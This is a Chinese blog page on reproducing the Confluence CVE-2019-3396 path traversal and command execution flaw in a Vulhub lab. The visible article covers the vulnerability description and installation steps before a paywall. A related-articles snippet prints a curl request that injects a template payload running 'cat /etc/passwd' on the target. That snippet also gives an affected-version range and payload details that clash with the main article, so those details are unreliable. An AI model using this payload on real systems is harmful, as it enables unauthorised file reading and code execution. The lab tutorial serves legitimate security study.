Vulhub漏洞系列:Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)

最新推荐文章于 2025-09-12 15:23:41 发布
原创 最新推荐文章于 2025-09-12 15:23:41 发布 · 1.5k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全漏洞

本文详细介绍了如何复现Atlassian Confluence的CVE-2019-3396漏洞,涉及路径穿越和远程代码执行。通过Vulhub环境,演示了从安装Confluence到利用漏洞读取系统文件(如`/etc/passwd`)和执行远程代码的过程。修复该漏洞的方法是升级Confluence到最新版本。

Vulhub漏洞系列:Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)

00.前言

这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺

01.Atlassian Confluence 简介

  Atlassian Confluence(简称Confluence)是一个专业的wiki程序(是一种在网络上开放且可供多人协同创作的超文本系统)。它是一个知识管理的工具,通过它可以实现团队成员之间的协作和知识共享。
  Confluence 不是一个开源软件,非商业用途可以免费使用。
其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息,文档协作,集体讨论;目前,Confluence被用于广泛地用于项目团队,开发团队,市场销售团队。

02.漏洞描述

  在Widget连接器中的Confluence Server和Data Center中存在一个服务器端模板注入漏洞。 攻击者可以利用此问题在运行漏洞版本的Confluence Server或Data Center的系统上实现服务器端模板注入,路径遍历和远程代码执行。

  6.6.12之前的版本,从6.12.3之前的6.7.0版本(6.12.x的固定版本)到6.13.3之前的版本6.13.0(6.13的固定版本)的所有版本的Confluence Server和Confluence数据中心。 x)和6.14.2之前的6.14.0版本(6.14.x的固定版本)开始。

参考:https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

原理:https://paper.seebug.org/884/

03.漏洞复现

靶机ip:192.168.10.139,os:Ubuntu 16.04 LTS
攻击主机:ip:192.168.10.131, os:Win7,工具:burpsuite

  老样子:首先,在vulhub-master中漏洞的相应位置打开终端,输入docker-compose up -d打开环境:

  docker-compose up -d

  然后输入docker ps查看环境是否打开成功:

  docker ps

  成功后接下来便可以开始漏洞的复现了。访问http://your-ip:8090会进入安装引导,选择“Trial installation”,之后会要求填写license key。点击“Get an evaluation license”,去Atlassian官方申请一个Confluence Server的测试证书(不要选择Data Center和Addons):

0x01安装

1:选择“Trial installation”
在这里插入图片描述

2:点击“Get an evaluation license”
在这里插入图片描述

3:申请一个Confluence Server的测试证书(不要选择Data Center和Addons)

在这里插入图片描述

4:申请的时候比较慢,将KEY复制并粘贴到登录页,然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长(建议使用4G内存以上的机器进行安装与测试),请耐心等待。
在这里插入图片描述

5:如果提示填写cluster node,路径填写 /home/confluence即可

最低0.47元/天 解锁文章
Atlassian Confluence 路径穿越命令执行漏洞(CVE-2019-3396)
谢公子的博客
01-31 1795
Confluence ConfluenceAtlassian公司开发的一个专业的企业知识管理协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence为团队提供一个协作环境。在这里,团队成员齐心协力,各擅其能,协同地编写文档和管理项目。从此打破不同团队、不同部门以及个人之间信息孤岛的僵局,Confluence真正实现了组织资源共享。Confluence 已经在超过100个国家,13500个组织中成功地应用
vulhub漏洞复现
qq_30854761的博客
04-26 4362
下载镜像 1 docker pull medicean/vulapps:s_shiro_1 直接运行镜像,将docker的8080端口映射到本地的 8080上 1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1 获取复现需要用到的ysoserial工具 若无mvn则自行下载安装 1 2 3 git clone..
vulhubAtlassian Confluence 路径穿越命令执行漏洞CVE-2019-3396)复现反思!
qq_45300786的博客
09-14 680
搭建confluence看这3篇教程,该cve搭建是用Confluence Server, 但是tm就是没有Confluence Server https://www.icode9.com/content-4-915235.html https://blog.csdn.net/weixin_30813225/article/details/99669339 https://www.cnblogs.com/huangxiaosan/p/14290034.html 我这里直接提供key AAABQw0ODAo
(二)vulhub专栏:Shiro漏洞复现汇总
云舒的博客
06-03 2147
Shiro漏洞复现汇总
vulhub漏洞复现-redis未授权访问getshell总结 (CVE-2022-0543)
最新发布
2302_79841575的博客
09-12 807
摘要:本文演示了Redis未授权访问漏洞的利用过程。漏洞影响版本低于6.x,主要由于未配置访问控制和密码认证所致。攻击者通过nmap扫描发现靶机开放6379端口后,使用redis-rogue-getshell工具建立主从复制连接,成功在目标系统执行命令。复现过程包括环境搭建、未授权连接验证和利用主从复制模式实现远程代码执行,展示了该高危漏洞的实际危害。
vulhub靶场搭建及漏洞复现教程
热门推荐
Cwillchris的博客
03-25 2万+
准备一个纯净的ubantu系统 1、先更新一下安装列表 sudo apt-get update 2、安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3、查看是否安装pip pip -V 检测到未安装,提示是否安装,按y下载 再次输入pip -V查看是否安装成功 4、安装docker-compose pip install docker-compose 查看是否安装成功 docker
Atlassian Confluence 路径穿越命令执行漏洞CVE-2019-3396
qq_45391176的博客
11-09 388
CVE-2019-3396 利用vulhub复现过程
Confluence未授权模板注入/代码执行(CVE-2019-3396)
公众号shadow sock7
04-04 6969
https://jira.atlassian.com/browse/CONFSERVER-57974 https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py Poc POST /rest/tinymce/1/macro/preview HTT...
Atlassian Confluence 路径穿越命令执行漏洞 CVE-2019-3396
山兔的博客
08-07 675
2.影响版本:6.6.12之前所有6.6.x版本,6.12.3之前所有6.12.x版本,6.13.13之前所有6.13.x版本,6.14.2之前所有6.14.x版本。访问服务器ip地址,如:192.168.109.130:8090 进行安装,安装步骤如下:选择Trial Installation——》Next。直接使用邮箱账号,点击New Trial License——》select product——》Confluence。然后会让你填写用户名,如果提示填写路径路径填写。我这边建立失败了,就不复现了。
Atlassian Confluence 路径穿越命令执行漏洞CVE-2019-3396)复现
玄道的网安博客
01-18 818
简介 Confluence是一个专业的企业知识管理协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。 影响版本 6.6.12版本之前所有版本 6.7.0-6.12.2版本 6.13.3之前的所有6.13.x版本 6.14.2之前的所有6.14.x版本 环境搭建 这里使用vulhub来安装 地址: https://github.com/vulhub/vulhub/tree/m...
利用Vulnhub复现漏洞 - Atlassian Confluence 路径穿越命令执行漏洞CVE-2019-3396
JiangBuLiu的博客
06-28 2231
Atlassian Confluence 路径穿越命令执行漏洞CVE-2019-3396)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/confluence/CVE-2019-3396/ 漏洞原理 Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本...
Confluence RCE CVE-2019-3396 详细分析调试
u010704579的博客
12-12 880
Confluence RCE CVE-2019-3396
CVE-2019-3396Confluence 文件读取漏洞复现
nex1less的博客
11-26 4901
0x01 漏洞描述 Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。 0x02 漏洞环境 1.根据我过往博客安装vulhub 2.cd 到指定目录: cd vulhub/confluence/CVE-2019-3396 ...
探索征服:CVE-2019-3396—解锁Confluence安全新纪元
gitblog_00068的博客
06-13 572
探索征服:CVE-2019-3396—解锁Confluence安全新纪元 去发现同类优质开源项目:https://gitcode.com/ 在信息安全的世界里,每一次漏洞的发现都是一次技术智慧的碰撞。今天,我们将聚焦于一个特别的开源项目——针对Atlassian Confluence的RCE(远程代码执行)漏洞CVE-2019-3396。本文旨在深度剖析这一项目的重要性,并通过详实的技术分析和...
漏洞复现|(CVE-2019-3396Confluence文件读取&远程命令执行
weixin_42282189的博客
10-22 1443
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 1、漏洞简介 Confluence是一个专业的企业知识管理协同软件,常用于构建企业wiki。它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence Server Confluence Data Center 中的 Widget Connector 存在服务端模板注入漏洞,攻击者构造特定请求可远程遍历服务器任意文件,进而可以包含恶意文件来执行代码.
CVE-2019-3396 实战反弹shell
weixin_45439698的博客
07-22 2951
前言 距离4月4日Confluence官方发布远程命令执行高危漏洞的安全更新距今已快一周的时间。在网上也陆续爆出了一系列的POC,但是这些POC仅局限于测试是否存在漏洞,或者就是只是命令执行,并不能进行shell的反弹,如果不能反弹shell,那要这洞有何用。 于是我花了一下午的时间去进行测试,才有了这篇利用该漏洞进行实战反弹shell的文章。 准备 鉴于网上已有一系列的分析文章,这里我也不做漏洞...
Vulhub漏洞复现
weixin_45995579的博客
09-30 2001
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
vulfocus confluence 文件读取 (CVE-2019-3396
03-01
### 关于Confluence文件读取漏洞CVE-2019-3396) #### 漏洞概述 Atlassian Confluence 存在一个路径遍历和命令执行漏洞,编号为CVE-2019-3396。此漏洞允许攻击者通过精心构造的请求来读取任意文件或执行系统命令[^1]。 #### 影响范围 受影响的产品版本包括但不限于: - Atlassian Confluence Server 和 Data Center 版本 5.8.0 至 7.4.3 - 使用 `widgetconnector` 插件的所有版本 #### 漏洞原理 该漏洞源于 Confluence 的一个小部件连接器功能,在处理特定类型的 URL 参数时未能正确验证输入,从而导致可以被用来触发服务器端模板注入 (SSTI),进而实现远程代码执行(RCE)[^4]。 #### 利用方式 为了在VulFocus环境中重现并测试这个漏洞,通常会按照如下方式进行设置操作: 1. 配置好含有易受攻击插件版本的Confluence实例; 2. 构造恶意payload发送给目标服务; 3. 成功获取敏感信息或执行命令; 具体来说,可以通过向 `/rest/tinymce/1/macro/preview` 接口提交特制参数来进行攻击尝试。例如,利用 Groovy 脚本来读取/etc/passwd 文件的内容作为演示目的之一[^2]。 ```bash curl -X POST http://target/rest/tinymce/1/macro/preview \ -H 'Content-Type: application/json' \ --data '{"contentId":"78645","macro":{"name":"widget","body":"","params":{"url":"https://example.com\/%24%7B%22context.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22).invoke(null).exec(%22cat /etc/passwd%22).getText()%7D"}}}' ``` 请注意上述示例仅用于教育和技术研究用途,请勿非法使用。 #### 安全修复建议 官方已经发布了针对这个问题的安全更新,强烈建议用户尽快升级至最新稳定版以消除潜在风险。对于无法立即升级的情况,则应考虑禁用相关的小工具链接特性直至能够完成补丁部署为止[^3]。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值